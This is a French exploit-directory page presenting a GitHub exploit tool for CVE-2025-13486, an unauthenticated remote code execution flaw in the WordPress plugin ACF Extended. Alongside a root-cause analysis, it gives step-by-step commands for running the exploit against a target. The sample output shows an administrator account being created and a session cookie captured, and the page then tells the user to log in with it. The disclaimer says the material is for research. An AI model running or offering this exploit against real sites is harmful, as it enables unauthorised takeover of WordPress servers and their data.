Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-13486 — CVE-2025-13486 - Exploit d'exécution de code à distance et d'élévation de privilèges | Kitploit
Outils/GitHubGitHub/whattheslime/cve-2025-13486
Escalade de PrivilègesAnalyse des VulnérabilitésAnalyse de CodeExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationDéveloppement de Charges Utiles
GitHubwhattheslime/cve-2025-13486

CVE-2025-13486

CVE-2025-13486 - Exploit d'exécution de code à distance et d'élévation de privilèges

Voir le dépôt
111il y a 8 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Exploit CVE-2025-13486

Plugin ACF Extended WordPress — Exécution de code à distance et élévation de privilèges

Exploit pour la CVE-2025-13486 découverte par Marcin Dudek (dudekmar)

⚠️ Avertissement

Ce dépôt est fourni uniquement à des fins de recherche et de sécurité défensive. L'auteur décline toute responsabilité en cas d'utilisation abusive de ces informations.


📌 Aperçu

Le plugin Advanced Custom Fields : Extended (ACFE) pour WordPress est vulnérable à l'exécution de code à distance (RCE) dans les versions 0.9.0.5 à 0.9.1.1.

La vulnérabilité se trouve dans la fonction prepare_form(), qui accepte une entrée contrôlée par l'utilisateur et la transmet à call_user_func_array() sans validation appropriée.

Cela permet à des attaquants non authentifiés d'exécuter du code PHP arbitraire sur le serveur de manière limitée, mais néanmoins suffisante pour créer un compte administrateur et se connecter.


🔬 Analyse de la cause racine

La chaîne de vulnérabilité est la suivante :

  1. includes/modules/form/module-form-front.php:24 -> L'action wp_ajax_nopriv_acfe/form/render_form_ajax déclenche le gestionnaire render_form_ajax.

  2. includes/modules/form/module-form-front.php:492 -> Le filtre acfe/form/prepare_form est appliqué, invoquant la fonction prepare_form().

  3. includes/modules/form/module-form-front-render.php:151 -> Les données $form contrôlées par l'utilisateur sont passées directement à call_user_func_array().


🎯 Exploitation

  1. Installer les dépendances Python :

    root@kitploit:~
    python3 -m venv venv
    venv/bin/pip install -r requirements.txt
    
  2. Identifier une cible WordPress vulnérable.

    La cible doit contenir une page avec un formulaire généré par ACFE.

    root@kitploit:~
    venv/bin/python3 CVE-2025-13486.py -t http://127.0.0.1:8000/\?page_id=2
    

    Exemple de sortie :

    root@kitploit:~
    [2025-12-19] [11:00:46] [success] ACFE version is vulnerable: 0.9.1.1
    [2025-12-19] [11:03:30] [info] Use `--exploit` to perform exploitation.
    
  3. Relancez le script avec l'option --exploit :

    root@kitploit:~
    venv/bin/python3 CVE-2025-13486.py -t http://127.0.0.1:8000/\?page_id=2 --exploit
    

    Exemple de sortie :

    root@kitploit:~
    [2025-12-19] [11:00:13] [success] ACFE version is vulnerable: 0.9.1.1
    [2025-12-19] [11:00:13] [success] ACFE nonce found: c5d75e0d16
    [2025-12-19] [11:00:14] [success] Account created: adm1n:2c5c87a94a2c5c87a94a (administrator)
    [2025-12-19] [11:00:14] [success] Authentication succeded!
    [2025-12-19] [11:00:14] [info] Cookie: wordpress_4411def9d576984c8d78253236b2a62f=adm1n%7C1766311214%7CwVDbFsbQpjYMM6ckgEQ6gwr6dcjIRhmqYed7Y46YqHJ%7C2f7857614d5ebe1216922dab79c3a8be7164cccde0869e1545f3bfb17c5d2859
    

📚 Références

  • https://www.wordfence.com/blog/2025/12/100000-wordpress-sites-affected-by-remote-code-execution-vulnerability-in-advanced-custom-fields-extended-wordpress-plugin/
  • https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/acf-extended/advanced-custom-fields-extended-0905-0911-unauthenticated-remote-code-execution-in-prepare-form
  • https://sploitus.com/exploit?id=13551590-2822-5E83-9737-F55F4B2F9F82
Télécharger l’outil
  • Utilisez le cookie d'authentification WordPress renvoyé pour vous connecter en tant que nouveau compte administrateur créé.